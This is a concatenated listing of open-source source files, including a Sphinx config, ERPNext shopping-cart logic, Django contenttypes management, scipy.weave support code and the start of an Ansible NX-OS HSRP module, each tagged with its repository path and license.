build_tmp = getenv('PYTHON_EXTBUILD_TMP')
libtraceevent = getenv('LIBTRACEEVENT')
liblk = getenv('LIBLK')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
extra_objects = [libtraceevent, liblk],
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
| gpl-2.0 |
nickeubank/python-igraph | doc/source/conf.py | 2 | 8435 | # -*- coding: utf-8 -*-
#
# python-igraph documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 17 11:36:14 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'python-igraph'
copyright = u'2010-2013, Tamás Nepusz, Gábor Csárdi'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.7'
# The full version, including alpha/beta/rc tags.
release = '0.7'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['include/*.rst']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"navbar_fixed_top": "false",
"navbar_class": "navbar navbar-inverse",
"bootstrap_version": "3"
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = False
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'python-igraphdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'python-igraph.tex', u'python-igraph Documentation',
u'Tamas Nepusz, Gabor Csardi', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'python-igraph', u'python-igraph Documentation',
[u'Tamas Nepusz, Gabor Csardi'], 1)
]
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'python-igraph'
epub_author = u'Tamas Nepusz, Gabor Csardi'
epub_publisher = u'Tamas Nepusz, Gabor Csardi'
epub_copyright = u'2010, Tamas Nepusz, Gabor Csardi'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
| gpl-2.0 |
gangadhar-kadam/verve_test_erp | erpnext/shopping_cart/cart.py | 6 | 11386 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import throw, _
import frappe.defaults
from frappe.utils import flt, get_fullname, fmt_money, cstr
from erpnext.utilities.doctype.address.address import get_address_display
from frappe.utils.nestedset import get_root_of
class WebsitePriceListMissingError(frappe.ValidationError): pass
def set_cart_count(quotation=None):
if not quotation:
quotation = _get_cart_quotation()
cart_count = cstr(len(quotation.get("items")))
frappe.local.cookie_manager.set_cookie("cart_count", cart_count)
@frappe.whitelist()
def get_cart_quotation(doc=None):
party = get_lead_or_customer()
if not doc:
quotation = _get_cart_quotation(party)
doc = quotation
set_cart_count(quotation)
return {
"doc": decorate_quotation_doc(doc),
"addresses": [{"name": address.name, "display": address.display}
for address in get_address_docs(party)],
"shipping_rules": get_applicable_shipping_rules(party)
}
@frappe.whitelist()
def place_order():
quotation = _get_cart_quotation()
quotation.company = frappe.db.get_value("Shopping Cart Settings", None, "company")
for fieldname in ["customer_address", "shipping_address_name"]:
if not quotation.get(fieldname):
throw(_("{0} is required").format(quotation.meta.get_label(fieldname)))
quotation.flags.ignore_permissions = True
quotation.submit()
if quotation.lead:
# company used to create customer accounts
frappe.defaults.set_user_default("company", quotation.company)
from erpnext.selling.doctype.quotation.quotation import _make_sales_order
sales_order = frappe.get_doc(_make_sales_order(quotation.name, ignore_permissions=True))
for item in sales_order.get("items"):
item.reserved_warehouse = frappe.db.get_value("Item", item.item_code, "website_warehouse") or None
sales_order.flags.ignore_permissions = True
sales_order.insert()
sales_order.submit()
frappe.local.cookie_manager.delete_cookie("cart_count")
return sales_order.name
@frappe.whitelist()
def update_cart(item_code, qty, with_doc):
quotation = _get_cart_quotation()
qty = flt(qty)
if qty == 0:
quotation.set("items", quotation.get("items", {"item_code": ["!=", item_code]}))
if not quotation.get("items") and \
not quotation.get("__islocal"):
quotation.__delete = True
else:
quotation_items = quotation.get("items", {"item_code": item_code})
if not quotation_items:
quotation.append("items", {
"doctype": "Quotation Item",
"item_code": item_code,
"qty": qty
})
else:
quotation_items[0].qty = qty
apply_cart_settings(quotation=quotation)
if hasattr(quotation, "__delete"):
frappe.delete_doc("Quotation", quotation.name, ignore_permissions=True)
quotation = _get_cart_quotation()
else:
quotation.flags.ignore_permissions = True
quotation.save()
set_cart_count(quotation)
if with_doc:
return get_cart_quotation(quotation)
else:
return quotation.name
@frappe.whitelist()
def update_cart_address(address_fieldname, address_name):
quotation = _get_cart_quotation()
address_display = get_address_display(frappe.get_doc("Address", address_name).as_dict())
if address_fieldname == "shipping_address_name":
quotation.shipping_address_name = address_name
quotation.shipping_address = address_display
if not quotation.customer_address:
address_fieldname == "customer_address"
if address_fieldname == "customer_address":
quotation.customer_address = address_name
quotation.address_display = address_display
apply_cart_settings(quotation=quotation)
quotation.flags.ignore_permissions = True
quotation.save()
return get_cart_quotation(quotation)
def guess_territory():
territory = None
geoip_country = frappe.session.get("session_country")
if geoip_country:
territory = frappe.db.get_value("Territory", geoip_country)
return territory or \
frappe.db.get_value("Shopping Cart Settings", None, "territory") or \
get_root_of("Territory")
def decorate_quotation_doc(quotation_doc):
doc = frappe._dict(quotation_doc.as_dict())
for d in doc.get("items", []):
d.update(frappe.db.get_value("Item", d["item_code"],
["website_image", "description", "page_name"], as_dict=True))
d["formatted_rate"] = fmt_money(d.get("rate"), currency=doc.currency)
d["formatted_amount"] = fmt_money(d.get("amount"), currency=doc.currency)
for d in doc.get("taxes", []):
d["formatted_tax_amount"] = fmt_money(flt(d.get("tax_amount_after_discount_amount")),
currency=doc.currency)
doc.formatted_grand_total_export = fmt_money(doc.grand_total,
currency=doc.currency)
return doc
def _get_cart_quotation(party=None):
if not party:
party = get_lead_or_customer()
quotation = frappe.db.get_value("Quotation",
{party.doctype.lower(): party.name, "order_type": "Shopping Cart", "docstatus": 0})
if quotation:
qdoc = frappe.get_doc("Quotation", quotation)
else:
qdoc = frappe.get_doc({
"doctype": "Quotation",
"naming_series": frappe.defaults.get_user_default("shopping_cart_quotation_series") or "QTN-CART-",
"quotation_to": party.doctype,
"company": frappe.db.get_value("Shopping Cart Settings", None, "company"),
"order_type": "Shopping Cart",
"status": "Draft",
"docstatus": 0,
"__islocal": 1,
(party.doctype.lower()): party.name
})
if party.doctype == "Customer":
qdoc.contact_person = frappe.db.get_value("Contact", {"email_id": frappe.session.user,
"customer": party.name})
qdoc.flags.ignore_permissions = True
qdoc.run_method("set_missing_values")
apply_cart_settings(party, qdoc)
return qdoc
def update_party(fullname, company_name=None, mobile_no=None, phone=None):
party = get_lead_or_customer()
if party.doctype == "Lead":
party.company_name = company_name
party.lead_name = fullname
party.mobile_no = mobile_no
party.phone = phone
else:
party.customer_name = company_name or fullname
party.customer_type == "Company" if company_name else "Individual"
contact_name = frappe.db.get_value("Contact", {"email_id": frappe.session.user,
"customer": party.name})
contact = frappe.get_doc("Contact", contact_name)
contact.first_name = fullname
contact.last_name = None
contact.customer_name = party.customer_name
contact.mobile_no = mobile_no
contact.phone = phone
contact.flags.ignore_permissions = True
contact.save()
party_doc = frappe.get_doc(party.as_dict())
party_doc.flags.ignore_permissions = True
party_doc.save()
qdoc = _get_cart_quotation(party)
if not qdoc.get("__islocal"):
qdoc.customer_name = company_name or fullname
qdoc.run_method("set_missing_lead_customer_details")
qdoc.flags.ignore_permissions = True
qdoc.save()
def apply_cart_settings(party=None, quotation=None):
if not party:
party = get_lead_or_customer()
if not quotation:
quotation = _get_cart_quotation(party)
cart_settings = frappe.get_doc("Shopping Cart Settings")
billing_territory = get_address_territory(quotation.customer_address) or \
party.territory or get_root_of("Territory")
set_price_list_and_rate(quotation, cart_settings, billing_territory)
quotation.run_method("calculate_taxes_and_totals")
set_taxes(quotation, cart_settings, billing_territory)
_apply_shipping_rule(party, quotation, cart_settings)
def set_price_list_and_rate(quotation, cart_settings, billing_territory):
"""set price list based on billing territory"""
quotation.selling_price_list = cart_settings.get_price_list(billing_territory)
# reset values
quotation.price_list_currency = quotation.currency = \
quotation.plc_conversion_rate = quotation.conversion_rate = None
for item in quotation.get("items"):
item.price_list_rate = item.discount_percentage = item.rate = item.amount = None
# refetch values
quotation.run_method("set_price_list_and_item_details")
# set it in cookies for using in product page
frappe.local.cookie_manager.set_cookie("selling_price_list", quotation.selling_price_list)
def set_taxes(quotation, cart_settings, billing_territory):
"""set taxes based on billing territory"""
quotation.taxes_and_charges = cart_settings.get_tax_master(billing_territory)
# clear table
quotation.set("taxes", [])
# append taxes
quotation.append_taxes_from_master("taxes", "taxes_and_charges")
def get_lead_or_customer():
customer = frappe.db.get_value("Contact", {"email_id": frappe.session.user}, "customer")
if customer:
return frappe.get_doc("Customer", customer)
lead = frappe.db.get_value("Lead", {"email_id": frappe.session.user})
if lead:
return frappe.get_doc("Lead", lead)
else:
lead_doc = frappe.get_doc({
"doctype": "Lead",
"email_id": frappe.session.user,
"lead_name": get_fullname(frappe.session.user),
"territory": guess_territory(),
"status": "Open" # TODO: set something better???
})
if frappe.session.user not in ("Guest", "Administrator"):
lead_doc.flags.ignore_permissions = True
lead_doc.insert()
return lead_doc
def get_address_docs(party=None):
if not party:
party = get_lead_or_customer()
address_docs = frappe.db.sql("""select * from `tabAddress`
where `%s`=%s order by name""" % (party.doctype.lower(), "%s"), party.name,
as_dict=True, update={"doctype": "Address"})
for address in address_docs:
address.display = get_address_display(address)
address.display = (address.display).replace("\n", "<br>\n")
return address_docs
@frappe.whitelist()
def apply_shipping_rule(shipping_rule):
quotation = _get_cart_quotation()
quotation.shipping_rule = shipping_rule
apply_cart_settings(quotation=quotation)
quotation.flags.ignore_permissions = True
quotation.save()
return get_cart_quotation(quotation)
def _apply_shipping_rule(party=None, quotation=None, cart_settings=None):
shipping_rules = get_shipping_rules(party, quotation, cart_settings)
if not shipping_rules:
return
elif quotation.shipping_rule not in shipping_rules:
quotation.shipping_rule = shipping_rules[0]
quotation.run_method("apply_shipping_rule")
quotation.run_method("calculate_taxes_and_totals")
def get_applicable_shipping_rules(party=None, quotation=None):
shipping_rules = get_shipping_rules(party, quotation)
if shipping_rules:
rule_label_map = frappe.db.get_values("Shipping Rule", shipping_rules, "label")
# we need this in sorted order as per the position of the rule in the settings page
return [[rule, rule_label_map.get(rule)] for rule in shipping_rules]
def get_shipping_rules(party=None, quotation=None, cart_settings=None):
if not party:
party = get_lead_or_customer()
if not quotation:
quotation = _get_cart_quotation()
if not cart_settings:
cart_settings = frappe.get_doc("Shopping Cart Settings")
# set shipping rule based on shipping territory
shipping_territory = get_address_territory(quotation.shipping_address_name) or \
party.territory
shipping_rules = cart_settings.get_shipping_rules(shipping_territory)
return shipping_rules
def get_address_territory(address_name):
"""Tries to match city, state and country of address to existing territory"""
territory = None
if address_name:
address_fields = frappe.db.get_value("Address", address_name,
["city", "state", "country"])
for value in address_fields:
territory = frappe.db.get_value("Territory", value)
if territory:
break
return territory
| agpl-3.0 |
hdeling/sofa | applications/plugins/SofaPython/doc/SofaDays_oct2013/4_ObjectCreator/ObjectCreator.py | 5 | 3041 | import Sofa
# utility python module to dynamically create objects in Sofa
def createDragon(parentNode,name,x,y,z,color):
node = parentNode.createChild(name)
# <EulerImplicit name="cg_odesolver" printLog="false" />
node.createObject('EulerImplicit',name='cg_odesolver')
# <CGLinearSolver iterations="25" name="linear solver" tolerance="1.0e-9" threshold="1.0e-9" />
node.createObject('CGLinearSolver', name='linear solver', iterations=25, tolerance=1.0e-9, threshold=1.0e-9)
node.createObject('MechanicalObject', dx=x, dy=y, dz=z)
node.createObject('UniformMass',name='mass',totalmass=10)
node.createObject('RegularGrid', name='RegularGrid1',nx=6, ny=5, nz=3, xmin=-11, xmax=11, ymin=-7, ymax=7, zmin=-4, zmax=4)
node.createObject('RegularGridSpringForceField', name='Springs', stiffness=350, damping=1 )
VisuNode = node.createChild('VisuDragon')
VisuNode.createObject('OglModel', name='Visual', filename='mesh/dragon.obj', color=color, dx=x, dy=y, dz=z)
VisuNode.createObject('BarycentricMapping', input='@..', output='@Visual')
SurfNode = node.createChild('Surf')
SurfNode.createObject('MeshObjLoader', name="loader", filename="mesh/dragon.obj")
SurfNode.createObject('Mesh', src="@loader")
SurfNode.createObject('MechanicalObject', src="@loader", dx=x, dy=y, dz=z)
SurfNode.createObject('Triangle')
SurfNode.createObject('Line')
SurfNode.createObject('Point')
SurfNode.createObject('BarycentricMapping')
return node
def createArmadillo(parentNode,name,x,y,z,color):
node = parentNode.createChild(name)
# <EulerImplicit name="cg_odesolver" printLog="false" />
node.createObject('EulerImplicit',name='cg_odesolver')
# <CGLinearSolver iterations="25" name="linear solver" tolerance="1.0e-9" threshold="1.0e-9" />
node.createObject('CGLinearSolver', name='linear solver', iterations=25, tolerance=1.0e-9, threshold=1.0e-9)
node.createObject('MechanicalObject', dx=x, dy=y, dz=z)
node.createObject('UniformMass',name='mass',totalmass=10)
# node.createObject('SparseGridTopology', n="4 4 4", fileTopology="mesh/Armadillo_verysimplified.obj")
# node.createObject('HexahedronFEMForceField', youngModulus=100)
node.createObject('RegularGrid', name='RegularGrid1',nx=4, ny=4, nz=4, xmin=-6, xmax=6, ymin=-6, ymax=9, zmin=-5, zmax=5)
node.createObject('RegularGridSpringForceField', name='Springs', stiffness=350, damping=1 )
VisuNode = node.createChild('VisuArmadillo')
VisuNode.createObject('OglModel', name='Visual', filename='mesh/Armadillo_verysimplified.obj', color=color, dx=x, dy=y, dz=z)
VisuNode.createObject('BarycentricMapping', input='@..', output='@Visual')
SurfNode = node.createChild('Surf')
SurfNode.createObject('MeshObjLoader', name="loader", filename="mesh/Armadillo_verysimplified.obj")
SurfNode.createObject('Mesh', src="@loader")
SurfNode.createObject('MechanicalObject', src="@loader", dx=x, dy=y, dz=z)
SurfNode.createObject('Triangle')
SurfNode.createObject('Line')
SurfNode.createObject('Point')
SurfNode.createObject('BarycentricMapping')
return node
| lgpl-2.1 |
alilotfi/django | django/contrib/contenttypes/management.py | 476 | 2521 | from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
"""
Creates content types for models in the given app, removing any model
entries that no longer have a matching model class.
"""
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate_model(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = {
model._meta.model_name: model
for model in app_config.get_models()}
if not app_models:
return
# Get all the content types
content_types = {
ct.model: ct
for ct in ContentType.objects.using(using).filter(app_label=app_label)
}
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
# Confirm that the content type is stale before deletion.
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
| bsd-3-clause |
efiring/scipy | scipy/weave/common_info.py | 100 | 4254 | """ Generic support code for:
error handling code found in every weave module
local/global dictionary access code for inline() modules
swig pointer (old style) conversion support
"""
from __future__ import absolute_import, print_function
from . import base_info
module_support_code = \
"""
// global None value for use in functions.
namespace py {
object None = object(Py_None);
}
const char* find_type(PyObject* py_obj)
{
if(py_obj == NULL) return "C NULL value";
if(PyCallable_Check(py_obj)) return "callable";
if(PyString_Check(py_obj)) return "string";
if(PyInt_Check(py_obj)) return "int";
if(PyFloat_Check(py_obj)) return "float";
if(PyDict_Check(py_obj)) return "dict";
if(PyList_Check(py_obj)) return "list";
if(PyTuple_Check(py_obj)) return "tuple";
if(PyFile_Check(py_obj)) return "file";
if(PyModule_Check(py_obj)) return "module";
//should probably do more intergation (and thinking) on these.
if(PyCallable_Check(py_obj) && PyInstance_Check(py_obj)) return "callable";
if(PyInstance_Check(py_obj)) return "instance";
if(PyCallable_Check(py_obj)) return "callable";
return "unknown type";
}
void throw_error(PyObject* exc, const char* msg)
{
//printf("setting python error: %s\\n",msg);
PyErr_SetString(exc, msg);
//printf("throwing error\\n");
throw 1;
}
void handle_bad_type(PyObject* py_obj, const char* good_type, const char* var_name)
{
char msg[500];
sprintf(msg,"received '%s' type instead of '%s' for variable '%s'",
find_type(py_obj),good_type,var_name);
throw_error(PyExc_TypeError,msg);
}
void handle_conversion_error(PyObject* py_obj, const char* good_type, const char* var_name)
{
char msg[500];
sprintf(msg,"Conversion Error:, received '%s' type instead of '%s' for variable '%s'",
find_type(py_obj),good_type,var_name);
throw_error(PyExc_TypeError,msg);
}
"""
#include "compile.h" /* Scary dangerous stuff */
#include "frameobject.h" /* Scary dangerous stuff */
class basic_module_info(base_info.base_info):
_headers = ['"Python.h"','"compile.h"','"frameobject.h"']
_support_code = [module_support_code]
#----------------------------------------------------------------------------
# inline() generated support code
#
# The following two function declarations handle access to variables in the
# global and local dictionaries for inline functions.
#----------------------------------------------------------------------------
get_variable_support_code = \
"""
void handle_variable_not_found(const char* var_name)
{
char msg[500];
sprintf(msg,"Conversion Error: variable '%s' not found in local or global scope.",var_name);
throw_error(PyExc_NameError,msg);
}
PyObject* get_variable(const char* name,PyObject* locals, PyObject* globals)
{
// no checking done for error -- locals and globals should
// already be validated as dictionaries. If var is NULL, the
// function calling this should handle it.
PyObject* var = NULL;
var = PyDict_GetItemString(locals,name);
if (!var)
{
var = PyDict_GetItemString(globals,name);
}
if (!var)
handle_variable_not_found(name);
return var;
}
"""
py_to_raw_dict_support_code = \
"""
PyObject* py_to_raw_dict(PyObject* py_obj, const char* name)
{
// simply check that the value is a valid dictionary pointer.
if(!py_obj || !PyDict_Check(py_obj))
handle_bad_type(py_obj, "dictionary", name);
return py_obj;
}
"""
class inline_info(base_info.base_info):
_support_code = [get_variable_support_code, py_to_raw_dict_support_code]
#----------------------------------------------------------------------------
# swig pointer support code
#
# The support code for swig is just slirped in from the swigptr.c file
# from the *old* swig distribution. The code from swigptr.c is now a string
# in swigptr.py to ease the process of incorporating it into py2exe
# installations. New style swig pointers are not yet supported.
#----------------------------------------------------------------------------
from . import swigptr
swig_support_code = swigptr.swigptr_code
class swig_info(base_info.base_info):
_support_code = [swig_support_code]
| bsd-3-clause |
naslanidis/ansible | lib/ansible/modules/network/nxos/nxos_hsrp.py | 8 | 22899 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: nxos_hsrp
version_added: "2.2"
short_description: Manages HSRP configuration on NX-OS switches.
description:
- Manages HSRP configuration on NX-OS switches.
extends_documentation_fragment: nxos
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- HSRP feature needs to be enabled first on the system.
- SVIs must exist before using this module.
- Interface must be a L3 port before using this module.
- HSRP cannot be configured on loopback interfaces.
- MD5 authentication is only possible with HSRPv2 while it is ignored if
HSRPv1 is used instead, while it will not raise any error. Here we allow
MD5 authentication only with HSRPv2 in order to enforce better practice.
options:
group:
description:
- HSRP group number.
required: true
interface:
description:
- Full name of interface that is being managed for HSRP.
required: true
version:
description:
- HSRP version.
required: false
default: 2
choices: ['1','2']
priority:
description:
- HSRP priority.
required: false
default: null
vip:
description:
- HSRP virtual IP address.
required: false
default: null
auth_string:
description:
- Authentication string.
required: false
default: null
auth_type:
description:
- Authentication type.
required: false
default: null
choices: ['text','md5']
state:
description:
- Specify desired state of the resource.
required: false
choices: ['present','absent']
default: 'present'
'''
EXAMPLES = '''
- name: Ensure HSRP is configured with following params on a SVI
nxos_hsrp:
group: 10
vip: 10.1.1.1
priority: 150
interface: vlan10
preempt: enabled
host: 68.170.147.165
- name: Ensure HSRP is configured with following params on a SVI
nxos_hsrp:
group: 10
vip: 10.1.1.1
priority: 150
interface: vlan10
preempt: enabled
host: 68.170.147.165
auth_type: text
auth_string: CISCO
- name: Remove HSRP config for given interface, group, and VIP
nxos_hsrp:
group: 10
interface: vlan10
vip: 10.1.1.1
host: 68.170.147.165
state: absent
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"group": "30", "version": "2", "vip": "10.30.1.1"}
existing:
description: k/v pairs of existing hsrp info on the interface
type: dict
sample: {}
end_state:
description: k/v pairs of hsrp after module execution
returned: always
type: dict
sample: {"auth_string": "cisco", "auth_type": "text",
"group": "30", "interface": "vlan10", "preempt": "disabled",
"priority": "100", "version": "2", "vip": "10.30.1.1"}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["interface vlan10", "hsrp version 2", "hsrp 30", "ip 10.30.1.1"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import json
# COMMON CODE FOR MIGRATION
import ansible.module_utils.nxos
from ansible.module_utils.basic import get_exception
from ansible.module_utils.netcfg import NetworkConfig, ConfigLine
from ansible.module_utils.shell import ShellError
from ansible.module_utils.network import NetworkModule
def to_list(val):
if isinstance(val, (list, tuple)):
return list(val)
elif val is not None:
return [val]
else:
return list()
class CustomNetworkConfig(NetworkConfig):
def expand_section(self, configobj, S=None):
if S is None:
S = list()
S.append(configobj)
for child in configobj.children:
if child in S:
continue
self.expand_section(child, S)
return S
def get_object(self, path):
for item in self.items:
if item.text == path[-1]:
parents = [p.text for p in item.parents]
if parents == path[:-1]:
return item
def to_block(self, section):
return '\n'.join([item.raw for item in section])
def get_section(self, path):
try:
section = self.get_section_objects(path)
return self.to_block(section)
except ValueError:
return list()
def get_section_objects(self, path):
if not isinstance(path, list):
path = [path]
obj = self.get_object(path)
if not obj:
raise ValueError('path does not exist in config')
return self.expand_section(obj)
def add(self, lines, parents=None):
"""Adds one or lines of configuration
"""
ancestors = list()
offset = 0
obj = None
## global config command
if not parents:
for line in to_list(lines):
item = ConfigLine(line)
item.raw = line
if item not in self.items:
self.items.append(item)
else:
for index, p in enumerate(parents):
try:
i = index + 1
obj = self.get_section_objects(parents[:i])[0]
ancestors.append(obj)
except ValueError:
# add parent to config
offset = index * self.indent
obj = ConfigLine(p)
obj.raw = p.rjust(len(p) + offset)
if ancestors:
obj.parents = list(ancestors)
ancestors[-1].children.append(obj)
self.items.append(obj)
ancestors.append(obj)
# add child objects
for line in to_list(lines):
# check if child already exists
for child in ancestors[-1].children:
if child.text == line:
break
else:
offset = len(parents) * self.indent
item = ConfigLine(line)
item.raw = line.rjust(len(line) + offset)
item.parents = ancestors
ancestors[-1].children.append(item)
self.items.append(item)
def get_network_module(**kwargs):
try:
return get_module(**kwargs)
except NameError:
return NetworkModule(**kwargs)
def get_config(module, include_defaults=False):
config = module.params['config']
if not config:
try:
config = module.get_config()
except AttributeError:
defaults = module.params['include_defaults']
config = module.config.get_config(include_defaults=defaults)
return CustomNetworkConfig(indent=2, contents=config)
def load_config(module, candidate):
config = get_config(module)
commands = candidate.difference(config)
commands = [str(c).strip() for c in commands]
save_config = module.params['save']
result = dict(changed=False)
if commands:
if not module.check_mode:
try:
module.configure(commands)
except AttributeError:
module.config(commands)
if save_config:
try:
module.config.save_config()
except AttributeError:
module.execute(['copy running-config startup-config'])
result['changed'] = True
result['updates'] = commands
return result
# END OF COMMON CODE
def execute_config_command(commands, module):
try:
output = module.configure(commands)
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending CLI commands',
error=str(clie), commands=commands)
except AttributeError:
try:
commands.insert(0, 'configure')
module.cli.add_commands(commands, output='config')
output = module.cli.run_commands()
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending CLI commands',
error=str(clie), commands=commands)
return output
def get_cli_body_ssh(command, response, module):
"""Get response for when transport=cli. This is kind of a hack and mainly
needed because these modules were originally written for NX-API. And
not every command supports "| json" when using cli/ssh. As such, we assume
if | json returns an XML string, it is a valid command, but that the
